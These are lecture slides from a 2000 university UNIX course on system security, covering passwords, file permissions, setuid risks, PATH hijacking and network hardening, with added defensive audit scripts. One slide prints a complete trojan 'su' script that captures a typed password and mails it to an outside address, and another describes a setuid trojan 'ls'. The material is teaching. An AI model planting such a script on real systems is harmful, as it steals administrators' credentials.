UNIX Tools G22.2245


UNIX Tools
G22.2245-001, Fall 2000
Danielle S. Lahmani
email: [email protected]
Lecture 11
2000 Copyrights, Danielle S. Lahmani
Security Definition
• “Making sure that the data stored on a
computer or computer networks, is
accessible only to people who are
authorized to see it,
• and that the data is safeguarded against
corruption or loss.”
• by K. Christian
Two major goals of security
• Protect data against loss (can be achieved
through frequent backups)
• Secure the system against intrusion and
unauthorized use.
COMPONENTS OF SECURITY
• Authentication: proving that you are who you
say you are
• Access Rights: giving you the information for
which you have clearance
• Integrity: Protecting information from
unauthorized exposure
• Prevention of subversion: guard against
replay attacks, Trojan horse attacks and
covert channel attacks.
Security Definitions
• A Trojan Horse is any program that performs
some obvious functions and compromises a
user's security at the same time.
• A covert channel is some way of getting
information other than direct reads and
writes; examples are the ps command or the
viewing of /tmp.
Protection against Intruders
• Password security
• File and file system security
• Incorrect search PATH
• Denial of service
• Networking security
Passwords and Accounts
• Every person should have his or her
individual account.
• Remove the accounts of people who no
longer need them or have left the company.
• Provide each user with an initial password and
instruct the user to change it immediately.
How passwords Work
• Passwords are encrypted:
– The login program uses the “salt” to encrypt the typed
password and then checks whether the resulting string
matches the password stored in /etc/passwd
Password Security
• People often use passwords that can be
guessed easily.
• Several measures to protect the login password:
– Most UNIX systems split the /etc/passwd file into two
files:
  The file /etc/passwd no longer contains the
  encrypted user password.
  /etc/shadow contains the encrypted password
  and can only be read by root, to avoid subversion,
  making it less vulnerable to password cracking.
Security Measures for password security
• Passwords should be changed periodically
• Don't use the same password on multiple
machines
• Don't use a previous password. If it was
stolen before, the system can be
compromised.
• Educate users about bad passwords and
good passwords.
• Use password filtering
• Enforce password aging.
Files and file system security:
– A file can be write-locked, but if the
directory is writable, an intruder can erase
your file and write a new one.
– File permission modes are discretionary:
the owner of the file can change them
whenever they want.
– Don't make your files or directories writable
by others.
– Make the directory containing the file and
its subdirectories write-protected.
File and File system Security
– Use your own temporary directory
under $HOME/tmp; /tmp and
/usr/tmp are writable by others.
Although your temporary file under
these directories is writable only by
you, another user can replace a temporary
file in /tmp or /usr/tmp, which has the
effect of changing your files.
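The $HOME/tmp advice above, worked through as an added example that is not part of the original slides: private_tmpfile (a hypothetical helper name) creates a temporary file in a directory that only its owner can access. It assumes the mktemp command is available.

```sh
#!/bin/sh
# Added example: private_tmpfile is a hypothetical helper name.
# Usage: private_tmpfile [home_dir] [prefix]   (prints the new file's path)
private_tmpfile() {
    base="${1:-$HOME}/tmp"
    prefix=${2:-work}
    # A symlink named tmp could redirect us into a directory that
    # someone else controls, so refuse it outright.
    if [ -L "$base" ]; then
        echo "refusing to use symlink $base" >&2
        return 1
    fi
    # Create the directory with no group/other access, then force mode 700
    # in case it already existed with looser permissions. For a non-root
    # user, chmod fails if the directory belongs to somebody else.
    ( umask 077 && mkdir -p "$base" ) || return 1
    chmod 700 "$base" || return 1
    # mktemp creates the file atomically, readable and writable only by
    # its owner, under an unpredictable name; it never reuses an
    # existing file.
    mktemp "$base/$prefix.XXXXXX"
}

# Constructed demonstration in a throwaway directory standing in for $HOME.
demo_home=$(mktemp -d)
tmpfile=$(private_tmpfile "$demo_home" report) && ls -l "$tmpfile"
rm -rf "$demo_home"
```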
set uid/set gid programs
• This is a feature whereby a program
during its invocation acquires privileges
of either a superuser or an author (the
owner of the file) for the duration of the
execution.
setuid/setgid subversion
• You can create a version of ls in a user's
directory that precedes /bin in his path. This
version has the setuid bit on.
The first thing it does is to create a new file
with the setuid bit on.
Then it erases itself with some indication that
a line has been disconnected.
If you executed the file, you would have all
the owner's privileges.
Scripts Precautions
• Do not write SUID/SGID shell scripts.
• Scripts should always use full pathnames
Superuser Precaution
• Discourage or disable direct login as root
• use /bin/su to gain root privileges:
• /bin/su attempts are logged with the name of
the user who issued the su command
su: subversion
– Name the following script su and place it in
a directory that administrators search
before the system's directories (this will only
work if the path is set to search the current
directory first):
    stty -echo                       # hide typing, as the real su does
    echo -n "Password:"
    read X                           # capture what the victim types
    echo ""
    stty echo
    echo $X | mail outside!creep &   # send the password off the machine
    sleep 1
    echo Sorry.                      # imitate a failed su attempt
    rm su                            # remove the evidence
Security recommendations
• Root Accounts:
• Login directly as root only at the console
• Only root should have uid 0
• Root should never have a "." in its path
• Only use full pathnames when issuing a
command
• Do not create root temp files if possible in
publicly owned directories.
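A check for the PATH rules above, covering the search-order condition that the su and ls subversions depend on: no "." or empty entry, and no directory that other users can write to. This is an added example, not part of the original lecture; audit_path is a hypothetical helper name and the sample PATH is constructed.

```sh
#!/bin/sh
# Added example: audit_path is a hypothetical helper, not a standard tool.
# It prints one line per risky PATH entry and returns non-zero if any exist.
# The body runs in a subshell, so the IFS and globbing changes do not leak.
audit_path() (
    path_value=$1
    findings=0
    flag() { printf '%s\n' "$1"; findings=$((findings + 1)); }

    # A leading, trailing, or doubled colon is an empty entry, which the
    # shell treats as the current directory, exactly like ".".
    case ":$path_value:" in
        *::*) flag "EMPTY: empty entry means current directory" ;;
    esac

    IFS=:
    set -f                          # no globbing while splitting on ':'
    for dir in $path_value; do
        case $dir in
            "") continue ;;         # already reported above
            /*) ;;                  # absolute: check permissions below
            *)  flag "RELATIVE: $dir"; continue ;;
        esac
        # Follow symlinks (-L) and read the mode string, e.g. drwxrwxrwt.
        mode=$(ls -ldL "$dir" 2>/dev/null | cut -c1-10)
        case $mode in
            # position 6 is group write, position 9 is other write
            d????w????|d???????w?) flag "WRITABLE: $dir ($mode)" ;;
        esac
    done
    [ "$findings" -eq 0 ]
)

# Constructed sample: "." in the middle and a trailing colon.
audit_path "/usr/bin:.:/bin:" || true
```

Run it as `audit_path "$PATH"` from root's own shell, since the PATH that matters is the one root actually logs in with.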
UNIX NETWORK SECURITY
• BERKELEY SERVICES
• The r* commands allow host equivalency, which
is based on the idea that if the user has been
authenticated on one trusted computer (host), then
there is no reason to reauthenticate the user on a
second computer.
• Host equivalence is extended through use of
.rhosts, .netrc and /etc/hosts.equiv files.
Berkeley r* commands
• An ordinary user can create a file .rhosts in her
$HOME directory and extend host equivalence to
herself when accessing the computer without any
intervention from a system administrator.
• In Sun systems, the r* commands have been
modified to run on top of ssh (secure shell) which
requires a password and ignores .rhosts
equivalence.
Security Standards and technology
• S-HTTP: Secure HTTP is an extension to the
HTTP protocol to provide authentication and
encryption facilities at the setup of a session.
• Client and Server negotiate which encryption
mechanism will be used to secure the
messages.
• (SSL) Secure Socket Layer provides server
authentication, data encryption and message
integrity at the transport layer.
• Use of SSL and S-HTTP is not mutually
exclusive.
Security Standards (cont’)
• Secure IP (IPV6) is a specification for
extensions to the IP protocol that includes
additional security functions: an
authentication header and the encapsulation
security payload (ESP) protocol.
• Authentication header holds computed
authentication information based on the
message.
• ESP protocol provides the ability to encrypt
some or all of the messages.
RECOMMENDATIONS FOR NETWORK SECURITY
• Source: http://www.unixtools.com/securecheck.html
Network Security: Filtering
• Do not enable services you are not
using (/etc/inetd.conf)
• Create access control lists
(/var/adm/inetd.sec) to say which hosts
can connect
• Filter out unnecessary services at the
router; only allow services you need.
• If you are on the Internet, build a
firewall.
FTP SECURITY
• Make sure you have /ftp/users with all
system accounts (uucp, bin, root)
• Minimal permissions / minimal accounts
• Always use FTP logging and look at the
logs
• Make directories unwriteable
PREVENT SPOOFING
• Router mode:
• Turn off source routing
• Apply a filter that guarantees that packets
coming from the outside network do not have
a source IP address that matches the inside
network.
• Qualified hostnames only in system files
(NFS, hosts.equiv…)
• No hosts.equiv or .rhosts if possible.
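The host-equivalence files described under the Berkeley r* commands can be checked against the recommendations above. This added example, which is not from the original lecture, flags wildcard trust and unqualified hostnames in a hosts.equiv or .rhosts style file; audit_trust_file is a hypothetical helper name and the sample file is constructed.

```sh
#!/bin/sh
# Added example: audit_trust_file is a hypothetical helper name.
# Prints one finding per risky line of a hosts.equiv/.rhosts style file
# ("host [user]" per line) and returns non-zero when anything was found.
audit_trust_file() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }          # blank lines and comments
        $1 ~ /^-/            { next }          # "-host" entries deny access
        {
            host = $1
            sub(/^\+/, "", host)               # "+host" is the same as "host"
            if ($1 == "+" || $2 == "+") {
                # A bare "+" matches every host (field 1) or every user (field 2).
                printf "%s:%d: WILDCARD %s\n", FILENAME, FNR, $0; bad++
            } else if (host ~ /^@/) {
                # Netgroup: trust depends on membership defined elsewhere.
                printf "%s:%d: NETGROUP %s\n", FILENAME, FNR, host; bad++
            } else if (host !~ /\./) {
                # No dot: not a fully qualified name (dotted IPs pass this test).
                printf "%s:%d: UNQUALIFIED %s\n", FILENAME, FNR, host; bad++
            }
        }
        END { exit (bad > 0) }
    ' "$1"
}

# Constructed sample input, not taken from a real system.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# trusted hosts
build1.example.com alice
fileserver
+ +
-oldhost.example.com
EOF
audit_trust_file "$sample" || true
rm -f "$sample"
```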